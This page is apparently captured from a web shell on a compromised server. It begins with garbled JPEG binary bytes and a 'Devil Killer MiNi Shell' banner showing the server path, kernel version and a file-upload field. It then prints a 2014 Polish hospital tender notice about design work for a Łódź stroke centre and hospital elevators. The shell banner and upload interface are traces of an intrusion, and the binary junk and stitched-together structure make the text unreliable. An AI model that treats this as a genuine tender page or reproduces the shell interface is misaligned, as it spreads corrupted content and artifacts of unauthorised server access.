JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140527/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140527/113537-N-2014.html

<p class="kh_header"><b>Łódź: Nr sprawy 57/ZP/2014. Dokumentacja projektowa - dla potrzeb Regionalnego Centrum Leczenia Udaru z Zespołem Rehabilitacji Udarowej i Neurologicznej - w nowej lokalizacji na VI piętrze budynku głównego wysokiego wraz z modernizacją 2 szt. wind szpitalnych i dobudową 2 szt. wind zewnętrznych do transportu chorych wymagających rehabilitacji  w WSS im. M Kopernika w Łodzi ul. Pabianicka 62.</b><br>
<b>Numer ogłoszenia: 113537 - 2014; data zamieszczenia: 27.05.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Specjalistyczny im. Mikołaja Kopernika , ul. Pabianicka 62, 93-513 Łódź, woj. łódzkie, tel. 042 6895910, 6895912, faks 042 6895911.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kopernik.lodz.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Nr sprawy 57/ZP/2014. Dokumentacja projektowa - dla potrzeb Regionalnego Centrum Leczenia Udaru z Zespołem Rehabilitacji Udarowej i Neurologicznej - w nowej lokalizacji na VI piętrze budynku głównego wysokiego wraz z modernizacją 2 szt. wind szpitalnych i dobudową 2 szt. wind zewnętrznych do transportu chorych wymagających rehabilitacji  w WSS im. M Kopernika w Łodzi ul. Pabianicka 62..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
usługa opracowania projektów architektonicznych budowlano-instalacyjnych, wykonawczych pomieszczeń na VI piętrze budynku  wysokiego dla Regionalnego Centrum Leczenia Udaru  z Zespołem Rehabilitacji Udarowej i Neurologicznej z modernizacją 2 szt. szybów windowych z wymianą urządzeń dźwigowych i oraz dobudową 2 szt. wind zewnętrznych dla transportu osób rehabilitowanych w W.S.S. im. M. Kopernika w Łodzi. 

PAKIET 1 -  opracowanie projektów architektonicznych budowlano - instalacyjnych - wykonawczych wraz z kosztorysami inwestorskimi i przedmiarami robót, informacją dotyczącą bezpieczeństwa i ochrony zdrowia oraz specyfikacją techniczną wykonania i odbioru robót/zwanych dalej na potrzeby niniejszego postępowania -Dokumentacją projektową - dla potrzeb Regionalnego Centrum Leczenia Udaru z Zespołem Rehabilitacji Udarowej i Neurologicznej - w nowej lokalizacji  w WSS im. M Kopernika w Łodzi ul Pabianickiej 62 
                                                                                   
PAKIET 2 -  opracowanie projektu technicznego - wykonawczego na modernizację 2 szt. wind towarowo - osobowych i dobudową 2 szt. wind zewnętrznych do transportu chorych wymagających rehabilitacji w budynku głównym wysokim w WSS im. M Kopernika w Łodzi ul Pabianicka 62..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.34.00-9, 71.32.00.00-7, 71.24.80.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 21.08.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Przystępując do przetargu Wykonawca jest obowiązany wnieść wadium w wysokości 2 556,82 zł (słownie: dwa tysiące pięćset pięćdziesiąt sześć tysięcy 82 gr). 

Pakiet nr 1 - 1 940,00 zł 
Pakiet nr 2 -    616,82 zł 

2.	 Wadium należy wpłacić przelewem na konto Zamawiającego:

 PeKaO S.A. V Oddział/Łódź 78 1240 1545 1111 0000 1166 9960

do dnia składania ofert z zaznaczeniem:

Wadium w postępowaniu na - opracowanie projektów architektonicznych budowlano - instalacyjnych - wykonawczych wraz 
z kosztorysami inwestorskimi i przedmiarami robót, informacją dotyczącą bezpieczeństwa i ochrony zdrowia oraz specyfikacją techniczną wykonania i odbioru robót dla potrzeb Regionalnego Centrum Leczenia Udaru z Zespołem Rehabilitacji Udarowej i Neurologicznej - w nowej lokalizacji na VI piętrze budynku głównego wysokiego wraz z modernizacją 2 szt. wind szpitalnych i dobudową 2 szt. wind zewnętrznych do transportu chorych wymagających rehabilitacji. Nr sprawy - 57/ZP/2014.
                                                                                                   
3.	Oferta zostanie uznana za zabezpieczoną, jeżeli środki z tytułu wadium faktycznie wpłyną na konto Zamawiającego do dnia i godziny składania oferty. Dowód wniesienia wadium należy dołączyć do oferty.

4.	Wadium może być wniesione w pieniądzu lub innych przewidzianych w art. 45 ust. 6 ustawy Prawo Zamówień Publicznych formach. Jeżeli wadium będzie wniesione w formie gwarancji albo poręczenia to jego oryginał musi być załączony do oferty.

5.	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy wskazany przez Zamawiającego w pkt. 1. 

6.	Oferta nie zabezpieczona wymaganym przez ustawę wadium zostanie odrzucona.

7.	Zamawiający zobowiązany jest zwrócić wadium na warunkach określonych w art. 46 ust. 1, 1a, 2, i 4 ustawy Prawo Zamówień Publicznych.

8.	Wykonawca traci wadium na rzecz Zamawiającego, jeżeli zaistnieje którakolwiek z przesłanek wymienionych w art. 46 ust. 4a i ust. 5 ustawy Prawo Zamówień Publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Spełnienie warunku zostanie dokonane na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Spełnienie warunku zostanie dokonane na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Spełnienie warunku zostanie dokonane na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Spełnienie warunku zostanie dokonane na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Spełnienie warunku zostanie dokonane na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Oświadczenie zgodnie z art. 36a ust. 1 i art. 36b ust. 1 ustawy w zakresie wskazania części zamówienia, której wykonanie zamierza powierzyć podwykonawcom - treść oświadczenia stanowi Załącznik nr 5 do SIWZ.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli Wykonawca wykazując spełnienie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, zamawiający w celu oceny, czy wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, żąda dokumentów dotyczących w szczególności:
a)	zakresu dostępnych wykonawcy zasobów innego podmiotu,
b)	sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia,
c)	charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem,
d)	zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia.
Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów o których mowa w pkt. a), zastępuje się je dokumentem oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem - wystawione z odpowiednia datą wymagana dla tych dokumentów.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie art. 144 ust. 1 Pzp. Zamawiający przewiduje możliwość dokonania poniższych zmian istotnych postanowień zawartej umowy:
1) zmiany terminu określonego w §3 ust. 1 niniejszej umowy, spowodowanej okolicznościami leżącymi po stronie Zamawiającego lub okolicznościami niezależnymi od Zamawiającego lub Wykonawcy, 
w szczególności:
a) konieczność udzielenia zamówień dodatkowych, których wykonanie wpłynie na zmianę terminu wykonania zamówienia podstawowego, 
b) przedłużający się termin uzyskania uzgodnień, postanowień i decyzji wydawanych przez organy administracji publicznej,
c) konieczność zmiany wcześniej przyjętych i zaakceptowanych rozwiązań; 
2) konieczności zmiany zakresu przedmiotu umowy oraz przedstawionych rozwiązań zawartych 
w dokumentacji projektowej, przy czym zmiana taka może być spowodowana wyłącznie okolicznościami zaistniałymi w trakcie realizacji przedmiotu umowy, w szczególności:
zmianą zakresu dokumentacji projektowej, stanowiącej przedmiot umowy, wskutek korekt dokonywanych w ramach pełnionego przez Wykonawcę nadzoru autorskiego, w sytuacjach nie wynikających z wad 
w pierwotnie wykonanym projekcie, bądź też okolicznościami wynikającymi z potrzeb Zamawiającego, których nie mógł on przewidzieć w momencie zwarcia umowy. Zmiana zakresu umowy nie może prowadzić do zmiany ceny, jeżeli nie jest to zmiana istotna. W przypadku zmian zasadniczych cena przedmiotu zamówienia może wzrosnąć maksymalnie o 20%.
3.) terminu świadczenia usługi nadzoru autorskiego w przypadku zmiany terminu(ów) (rozpoczęcia i/lub zakończenia) realizacji zadania, której dotyczy dokumentacja projektowa stanowiąca przedmiot niniejszej umowy oraz wysokości wynagrodzenia Wykonawcy za pełnienie nadzoru autorskiego w takim przypadku - zmiana nastąpi w oparciu o wartość wskaźnika cen towarów i usług konsumpcyjnych, ogłoszonego przez Prezesa Głównego Urzędu Statystycznego za ostatni kwartał poprzedzający zawarcie aneksu do umowy,
     4) zmiany stawki podatku VAT - zmianie ulegnie wynagrodzenie brutto, stosownie do zmiany stawki VAT.
2.  Zmiany do umowy określone w ust. 1 wymagają formy pisemnej pod rygorem nieważności w postaci aneksu do umowy i muszą być udokumentowane. 
3.	Zmiany, o których mowa w ust. 1 pkt 1) i 2) niniejszego paragrafu, winny zostać udokumentowane przez Wykonawcę na piśmie, w sposób nie budzący wątpliwości. Pismo zostanie złożone u Zamawiającego nie później niż na 7 dni przed upływem terminu określonego w §3 ust. 1 niniejszej umowy.
4.	Zamawiający niezwłocznie złoży u Wykonawcy pismo informujące o zmianie, o której mowa w ust. 1 pkt 4) niniejszego paragrafu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kopernik.lodz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> WOJEWÓDZKI  SZPITAL SPECJALISTYCZNY
 im. M. Kopernika w Łodzi
ul. Pabianicka 62
93-513  Łódź
Dział Zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.06.2014 godzina 10:00, miejsce: WOJEWÓDZKI  SZPITAL SPECJALISTYCZNY
 im. M. Kopernika w Łodzi
ul. Pabianicka 62
93-513  Łódź
Kancelaria Szpitala.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> opracowanie projektów architektonicznych budowlano - instalacyjnych - wykonawczych wraz 
z kosztorysami inwestorskimi i przedmiarami robót, informacją dotyczącą bezpieczeństwa i ochrony zdrowia oraz specyfikacją techniczną wykonania i odbioru robót/zwanych dalej na potrzeby niniejszego postępowania -Dokumentacją projektową - dla potrzeb Regionalnego Centrum Leczenia Udaru z Zespołem Rehabilitacji Udarowej i Neurologicznej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres opracowania:
Przedmiotem opracowania będzie wykonanie projektów architektonicznych budowlano - instalacyjnych, wykonawczych adaptacji pomieszczeń na VI piętrze budynku głównego wysokiego pod potrzeby  Regionalnego Centrum Leczenia Udaru z Zespołem Rehabilitacji Udarowej i Neurologicznej z dostosowaniem ich do rozporządzenia Ministra Zdrowia w sprawie szczegółowych wymagań, jakim powinny odpowiadać pomieszczenia i urządzenia podmiotu wykonującego działalność leczniczą.

Opracowanie powinno w maksymalnym stopniu uwzględniać wykorzystanie istniejących pomieszczeń, bez zbędnych przekuć i przebudowy. Instalacje wewnętrzne powinny być opracowane w nawiązaniu do istniejących instalacji.

Należy uwzględnić wymianę wszystkich okien na VI piętrze oraz w miarę potrzeb montaż drzwi przesuwnych i ppoż.
W Zespole Rehabilitacji Udarowej i Neurologicznej należy wydzielić Salę Rehabilitacyjną do ćwiczeń w  okolicy wydzielonych łóżek rehabilitacyjnych. Należy uwzględnić adaptację pomieszczeń na :
1 pokój lekarski z łazienką i pomieszczeniem socjalnym,
2 pokoje lekarza dyżurnego, po jednym po lewej i prawej stronie budynku
2 punkty pielęgniarskie, po jednym, po lewej i prawej stronie budynku.
Ponadto  należy dokonać:
-  adaptacji sal chorych dla 20 łóżek neurologicznych i 5 łóżek rehabilitacyjnych - po prawej stronie budynku
     -  adaptacji sal chorych dla 25 łóżek udarowych i 10 łóżek rehabilitacyjnych - po lewej stronie budynku

Dokumentacja winna  zawierać:
a.   opracowanie  koncepcji  technologiczno-użytkowej i uzyskanie jej akceptacji  przez Zamawiającego, 
     b. 	opracowanie dokumentacji projektowej niezbędnej do uzyskania decyzji pozwolenia na budowę wraz z uzyskaniem prawomocnego pozwolenia na budowę,
c.   opracowanie projektu aranżacji wnętrz oraz uzyskanie akceptacji projektu przez Zamawiającego,
d.  opracowanie wielobranżowej dokumentacji projektowej wykonawczej,
e.   uzyskanie w imieniu Zamawiającego odpowiednich opinii oraz niezbędnych pozwoleń i decyzji administracyjnych,
f.   przedmiary robót - 2 egz.
g.   kosztorysy inwestorskie - 2 egz. w tym w oddzielnym opracowaniu:
               - wymiana okien i drzwi ppoż. i przesuwnych,
               - roboty budowlane,
               - roboty instalacyjne branżowe         
h.   pełnienie nadzoru autorskiego w trakcie realizacji zadania.

Dokumentacja Projektową należy wykonać: 
Zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz.U.03.120.1133 z późn. zm.) Ustawą z dnia 15 kwietnia 2011 r. o działalności leczniczej (Dz. U. Nr 112, poz. 654 z późniejszymi zmianami);   Rozporządzeniem Ministra Zdrowia z dnia 29.06. 2012r  (Dz. U. z 2012 poz. 739)  oraz innymi obowiązującymi w trakcie wykonywania zamówienia aktami prawnymi)
Zamawiający wymaga, aby dokumentacja projektowa została wykonana w 6 egz. i  zawierała:
a. Projekt technologii medycznej  
b. Projekt budowlano-konstrukcyjny                                                                                                                   
c. Projekt instalacji wod-kan   
d. Projekt instalacji c-o  
e. Projekt instalacji gazów medycznych  
f. Projekt instalacji przyzywowej
g. Projekt instalacji sygnalizacji pożaru
h. Projekt instalacji elektrycznej, teletechnicznej  i  informatycznej
i. Projekt  instalacji klimatyzacji i wentylacji mechanicznej
j. Projekt instalacji zasilania nagrzewnic klimatyzacji
k. Kosztorysy inwestorskie 
l.  Przedmiary robót
 m. Informację bezpieczeństwa i ochrony zdrowia    
 n. Specyfikację techniczną wykonania i odbioru robót.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.34.00-9, 71.32.00.00-7, 71.24.80.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> opracowanie projektu technicznego - wykonawczego na modernizację 2 szt. wind towarowo
- osobowych i dobudową 2 szt. wind zewnętrznych do transportu chorych wymagających rehabilitacji 
w budynku głównym wysokim w WSS im. M Kopernika w Łodzi ul Pabianicka 62..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres opracowania:
Przedmiotem opracowania będzie wykonanie kompleksowych projektów technicznych - wykonawczych:

 A.  modernizacji 2 szt. szybów windowych i wymianę urządzeń dźwigowych i kabin dla transportu chorych na łóżkach oraz osób rehabilitowanych w budynku głównym wysokim (9 przystanków) Szpitala zlokalizowanych po jednej po lewej prawej stronie budynku. W opracowaniu należy również uwzględnić automatykę sygnalizacji pożaru oraz wentylację mechaniczną.

B.  dobudowy 2 szt. wind zewnętrznych do transportu chorych na łóżkach oraz pacjentów podlegających rehabilitacji. 

Do głównej klatki schodowej budynku wysokiego należy dobudować dwie windy zewnętrzne do transportu chorych na łóżkach (szpitalne) - 9 przystanków, równolegle do istniejących głównych wind szpitalnych. 
W opracowaniu  należy uwzględnić automatykę sygnalizacji pożaru oraz wentylację mechaniczną.

Dokumentacja Projektową należy wykonać: 
Zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz.U.03.120.1133 z późn. zm.) Ustawą z dnia 15 kwietnia 2011 r. o działalności leczniczej (Dz. U. Nr 112, poz. 654 z późniejszymi zmianami); Rozporządzeniem Ministra Zdrowia z dnia 29.06.2012 r.  (Dz. U. z 2012 poz. 739) oraz innymi obowiązującymi w trakcie wykonywania zamówienia aktami prawnymi)
Zamawiający wymaga, aby dokumentacja projektowa została wykonana w 6 egz. i  zawierała:
a. Projekt budowlano-konstrukcyjny                                                                                                                 
